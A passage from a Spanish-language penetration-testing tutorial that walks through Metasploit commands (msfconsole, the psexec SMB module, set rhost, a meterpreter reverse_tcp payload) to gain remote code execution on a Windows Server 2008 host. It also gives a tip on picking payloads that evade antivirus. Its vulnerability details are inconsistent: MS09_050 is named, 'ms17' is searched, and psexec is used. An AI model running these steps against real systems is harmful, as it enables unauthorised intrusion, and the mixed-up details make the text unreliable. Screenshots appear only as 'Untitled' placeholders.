Se trata de una vulnerabilidad de tipo crítica, ya que permite a un atacante poder ejecutar mediante un servicio o aplicación vulnerable códigos en la máquina remota. Existen muchos modos de poder ejecutar código remoto en una máquina gracias al repertorio de exploits con el que contamos. Pero además de ello, si hemos sido observadores, podemos aplicar alguna técnica manual.

Supongamos que auditando una máquina Windows Server 2008, observamos en nuestro informe de resultados de Nessus que la máquina es vulnerable a la incidencia MS09_050, un módulo con el que cuenta la herramienta Metasploit.

Como se ha explicado anteriormente, para abrir Metasploit primero tendremos que iniciar el servicio de las bases de datos PostgreSQL. service postgresql start.

Tras haberse iniciado el servicio escribiremos el comando msfconsole.

Untitled

Para agilizar la búsqueda de dicho exploit se usa la sentencia search ms17.

Untitled

Untitled

De hecho, ciertos servicios permiten comprobar los privilegios, permisos, recursos compartidos de las cuentas de usuario. Pero deben configurarse correctamente.

Untitled

Untitled

Con la sentencia use exploit/windows/smb/psexec entraremos en dicho módulo. Bien, ahora toca observar las opciones y ponerlas acuerdo a nuestro objetivo. Escribiremos options para que nos muestre los parámetros que podemos cambiar en el módulo de dicho exploit.

Untitled

El primer valor que debemos cambiar es obviamente la dirección IP de nuestro objetivo. Para cambiarlo escribiremos set rhost IPobjetivo.

Pero además debemos de escoger el payload que vamos a usar. Si recordamos el gráfico que mostramos en la vulnerabilidad Buffer Overflow, nuestro payload corresponderá a la sección roja de código malicioso. Para ver qué payloads tenemos disponibles para este módulo escribiremos show payloads.

Untitled

La lista de payloads, como puede observarse, es larguísima. Pero el truco consiste en que cuanto más sencillo sea el payload, más posibilidades tendrá de «caber» en el buffer y de además, evadir el antivirus. Un ejemplo de payload MUY sencillo sería windows/exec ya que se limita a ejecutar un comando que le indiquemos.

Untitled

Para configurar dicho payload en nuestro exploit se escribirá el comando set payload Windows/meterpreter/reverse_tcp.

Untitled